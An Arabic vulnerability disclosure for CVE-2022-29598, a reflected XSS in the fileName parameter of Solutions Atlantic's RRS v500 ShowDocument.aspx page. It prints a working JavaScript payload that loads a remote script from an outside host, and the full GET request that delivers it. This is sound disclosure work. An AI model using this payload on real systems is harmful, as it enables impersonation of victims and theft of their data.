
تطبيق RRS v500 معرّض لثغرة البرمجة النصية عبر المواقع (XSS) المنعكسة.
رابط Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598
رابط NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29598
تطبيق RRS الإصدار v500 من شركة Solutions Atlantic يعاني من ثغرة برمجة نصية عبر المواقع (XSS) منعكسة. يمكن أن يسمح استغلال ثغرة XSS للمهاجم بانتحال شخصية المستخدم الضحية، أو الكشف عن بيانات حساسة، أو تنفيذ إجراءات يُسمح للمستخدم الضحية بتنفيذها.
تبين أن المعامل fileName يقبل مدخلات المستخدم ويعكسها داخل استجابة الخادم. على الرغم من إجراء بعض تصفية وتنقية مدخلات المستخدم قبل الانعكاس، مثل ترميز بعض الأحرف الخاصة (رموز أكبر/أصغر من)، ونظرًا لأن الانعكاس حدث داخل سياق JavaScript، فقد يمكن حقن كود JavaScript في استجابة الخادم، متجاوزًا القيود.
الرابط المتأثر:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxحمولة XSS المستخدمة:
javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//الرابط المتأثر:
/RRSWeb/maint/ShowDocument/ShowDocument.aspxيمتلك التطبيق القدرة على الارتباط بمواقع ويب خارجية. عند اختيار رابط إلى الموقع الخارجي، يتم إرسال طلب إلى /RRSWeb/maint/ShowDocument/ShowDocument.aspx مع معاملين: fileName، الذي سيحتوي على رابط الموقع الخارجي الذي سيتم إعادة التوجيه إليه، وrequestType، الذي ستكون قيمته ExternalLink. طالما تم ضبط معامل requestType على قيمته الافتراضية، فإن أي شيء يدخله المستخدم في معامل fileName سوف ينعكس في سياق JavaScript، وتحديدًا داخل window.location.href. باستخدام حمولة XSS مع توجيه JavaScript، يمكن تنفيذ هجوم XSS منعكس بنجاح.
طلب GET مع حمولة XSS:
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0
استجابة الخادم:

معروض في المتصفح:

أبريل 2022